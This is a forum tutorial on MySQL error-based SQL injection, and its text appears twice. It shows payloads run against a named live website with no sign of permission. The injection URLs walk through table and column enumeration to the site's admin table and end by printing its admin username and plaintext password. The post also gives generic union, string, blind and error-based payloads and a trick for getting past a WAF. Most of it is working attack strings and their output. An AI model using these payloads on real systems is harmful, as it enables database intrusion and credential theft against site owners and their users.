Error Based Injection
Introduction
So lately I've been trying to take the time to make an error based tutorial..
I should have been had it done, but I was saving it for 1337 posts!
Anyways, I'll be using this site as an example.
Code:
You don't need to go into error based for this site, but I'm going to anyways, just for the tutorial.
Error Based Injection is really helpful when you run into what I call "stupid errors". Here's a few examples.
Code:
1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604
The list goes on, it's really useful for times like these..
Getting The Version
So what we want to to, is force an error by duplicating what we want out of the site.
Let's check the version before we go into getting the tables, because if it's less then 5, these queries won't work because information_schema doesn't exist.
Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
So now my url looks like this.
Code:
http://www.leadacidbatteryinfo.org/...concat_ws(0x7e,version(),floor(rand(0)*2))+ha ?ving+min(0)+or+1--
What we want to look for, is the duplicate entry error. As you can see, the site has the error.
Code:
Duplicate entry '5.1.52-log~1' for key 'group_key'
Spoiler (Click to View)
Getting The Table Names
Now we know information_schema exists, so we can use it to get data out of the tables.
So now let's start by getting our table names.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam ? e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE ? X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
http://www.leadacidbatteryinfo.org/...from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+ ?group+by+x)a)
We get our duplicate entry, for our first table name.
Spoiler (Click to View)
Now we have to use limit to get the next table name.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+ ?group+by+x)a)
Spoiler (Click to View)
Now that we know how to get our table names, we just keep incrementing in the limit statement until we come across a "juicy" table.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+10,1),floor(rand(0)*2))x+from+information_schema.tables ?+group+by+x)a)
Oh looky, tbladmin!
Spoiler (Click to View)
Getting The Columns
Now we want to get the columns, out of that table. So we change our syntax up a little bit, and hex our table name.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_na ? me+as+char),0x7e))+from+information_schema.columns+where+table_name=0xHEXOFTABLE ? +limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
Remember when we HEX our table name, 0x always goes in front.
74626c61646d696e is the hex of my table name, which was tbladmin.
So far we have adminid
Spoiler (Click to View)
Now we increment in our limit statement until we get the columns we want.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
That returns to username.
Spoiler (Click to View)
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
That returns to password.
Spoiler (Click to View)
Getting Data Out Of Columns
So now we have adminid, username, and password.
Now we put those in a concat statement, from the table we want.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(co ? lumn1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor ?(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbla ? dmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
And I get the duplicate entry for the adminid, username, and password.
Code:
Duplicate entry '1~ishir~ishir123~1' for key 'group_key'
Spoiler (Click to View)
BONUS!
I'm going to be explaining a few functions, that way you can get a better understanding of what you're actually doing.
The Count Function
This is pretty obvious, it counts something. It's an easy way to check how many databases/tables there are. You can use this in many different injections, here's a few ways to use it in the following injections.
Lets say 3 is our vulnerable column, out of 5 columns.
Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,count(schema_name),4,5+from+information_schema?.schemata--
String Based:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,count(schema_name),4,5+from+information_schem?a.schemata-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ? ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, ?1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Blind:
Code:
www.site.com/dork.php?id=5+and+ascii(substring((select+concat(count(schema_name))+from+inform ?ation_schema.schemata+limit+0,1),1,1))>0
The Substring Function
Now this is really useful in blind injection, because you need to get things letter by letter.
Sometimes you might go into error based injection, and get the error of "Subquery returns more then 1 row".
Example, lets say we want the first letter of the information from the username column, from the admin table.
Code:
substring(DATA, start length, end length)
So lets say the username is admin, and the table name is admin.
Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,1)+from+admin--
The returned letter would be 'a' because that's the first letter.
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,5)+from+admin--
The returned value would be 'admin' because it ends at the 5th letter, which is admin.
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,3,5)+from+admin--
The returned value would be 'min', because it starts at the 3rd letter, and ends at the 5th.
String Injection:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,substring(username,1,1)+from+admin-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ? ast(concat(substring(username,1,1))+as+char),0x7e))+from+admin+limit+0,1),floor( ?rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Concat & Limit
For some sites, the function group_concat, concat,or concat_ws won't exist, so you'd need to use limit.
Lets say our table name is admin, and we get an error when we try something like...
Code:
www.site.com/dork.php?id=null+union+select+1,2,group_concat(table_name,0x0a),4,5+from+informa ?tion_schema.tables+where+table_schema=database()--
"Function group_concat does not exist in blahblahblah".
Instead, we'd use limit and concat, or just table_name to get them.
Code:
www.site.com/dork.php?id=null+union+select+1,2,table_name,4,5+from+information_schema.tables+ ?where+table_schema=database()+limit+0,1--
It would give us our first table name.
Like & Between
Is the WAF getting on your nerves when you're trying to use =?
You can use keywords to get around that.
Let's say our table name is admin, and we're trying to get columns out of it.
Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name=0x61646d696e--
We get our 403/406 error. We can use "Like" instead of =.
Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name+like+0x61646d696e--
You can also use between, and it works the same way...
Well I'll be updating this soon, once I think of more stuff to add onto it.
Please leave a comment if you learned something/liked it, thanks alot!
Introduction
So lately I've been trying to take the time to make an error based tutorial..
I should have been had it done, but I was saving it for 1337 posts!
Anyways, I'll be using this site as an example.
Code:
You don't need to go into error based for this site, but I'm going to anyways, just for the tutorial.
Error Based Injection is really helpful when you run into what I call "stupid errors". Here's a few examples.
Code:
1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604
The list goes on, it's really useful for times like these..
Getting The Version
So what we want to to, is force an error by duplicating what we want out of the site.
Let's check the version before we go into getting the tables, because if it's less then 5, these queries won't work because information_schema doesn't exist.
Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--
So now my url looks like this.
Code:
http://www.leadacidbatteryinfo.org/...concat_ws(0x7e,version(),floor(rand(0)*2))+ha ?ving+min(0)+or+1--
What we want to look for, is the duplicate entry error. As you can see, the site has the error.
Code:
Duplicate entry '5.1.52-log~1' for key 'group_key'
Spoiler (Click to View)
Getting The Table Names
Now we know information_schema exists, so we can use it to get data out of the tables.
So now let's start by getting our table names.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam ? e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE ? X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
http://www.leadacidbatteryinfo.org/...from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+ ?group+by+x)a)
We get our duplicate entry, for our first table name.
Spoiler (Click to View)
Now we have to use limit to get the next table name.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+ ?group+by+x)a)
Spoiler (Click to View)
Now that we know how to get our table names, we just keep incrementing in the limit statement until we come across a "juicy" table.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table ? _schema=database()+limit+10,1),floor(rand(0)*2))x+from+information_schema.tables ?+group+by+x)a)
Oh looky, tbladmin!
Spoiler (Click to View)
Getting The Columns
Now we want to get the columns, out of that table. So we change our syntax up a little bit, and hex our table name.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_na ? me+as+char),0x7e))+from+information_schema.columns+where+table_name=0xHEXOFTABLE ? +limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
Remember when we HEX our table name, 0x always goes in front.
74626c61646d696e is the hex of my table name, which was tbladmin.
So far we have adminid
Spoiler (Click to View)
Now we increment in our limit statement until we get the columns we want.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
That returns to username.
Spoiler (Click to View)
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+tab ? le_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema ?.tables+group+by+x)a)
That returns to password.
Spoiler (Click to View)
Getting Data Out Of Columns
So now we have adminid, username, and password.
Now we put those in a concat statement, from the table we want.
Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(co ? lumn1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor ?(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
So now my link looks like this.
Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+c ? oncat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbla ? dmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
And I get the duplicate entry for the adminid, username, and password.
Code:
Duplicate entry '1~ishir~ishir123~1' for key 'group_key'
Spoiler (Click to View)
BONUS!
I'm going to be explaining a few functions, that way you can get a better understanding of what you're actually doing.
The Count Function
This is pretty obvious, it counts something. It's an easy way to check how many databases/tables there are. You can use this in many different injections, here's a few ways to use it in the following injections.
Lets say 3 is our vulnerable column, out of 5 columns.
Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,count(schema_name),4,5+from+information_schema?.schemata--
String Based:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,count(schema_name),4,5+from+information_schem?a.schemata-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ? ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, ?1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Blind:
Code:
www.site.com/dork.php?id=5+and+ascii(substring((select+concat(count(schema_name))+from+inform ?ation_schema.schemata+limit+0,1),1,1))>0
The Substring Function
Now this is really useful in blind injection, because you need to get things letter by letter.
Sometimes you might go into error based injection, and get the error of "Subquery returns more then 1 row".
Example, lets say we want the first letter of the information from the username column, from the admin table.
Code:
substring(DATA, start length, end length)
So lets say the username is admin, and the table name is admin.
Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,1)+from+admin--
The returned letter would be 'a' because that's the first letter.
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,5)+from+admin--
The returned value would be 'admin' because it ends at the 5th letter, which is admin.
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,3,5)+from+admin--
The returned value would be 'min', because it starts at the 3rd letter, and ends at the 5th.
String Injection:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,substring(username,1,1)+from+admin-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(c ? ast(concat(substring(username,1,1))+as+char),0x7e))+from+admin+limit+0,1),floor( ?rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Concat & Limit
For some sites, the function group_concat, concat,or concat_ws won't exist, so you'd need to use limit.
Lets say our table name is admin, and we get an error when we try something like...
Code:
www.site.com/dork.php?id=null+union+select+1,2,group_concat(table_name,0x0a),4,5+from+informa ?tion_schema.tables+where+table_schema=database()--
"Function group_concat does not exist in blahblahblah".
Instead, we'd use limit and concat, or just table_name to get them.
Code:
www.site.com/dork.php?id=null+union+select+1,2,table_name,4,5+from+information_schema.tables+ ?where+table_schema=database()+limit+0,1--
It would give us our first table name.
Like & Between
Is the WAF getting on your nerves when you're trying to use =?
You can use keywords to get around that.
Let's say our table name is admin, and we're trying to get columns out of it.
Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name=0x61646d696e--
We get our 403/406 error. We can use "Like" instead of =.
Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name+like+0x61646d696e--
You can also use between, and it works the same way...
Well I'll be updating this soon, once I think of more stuff to add onto it.
Please leave a comment if you learned something/liked it, thanks alot!
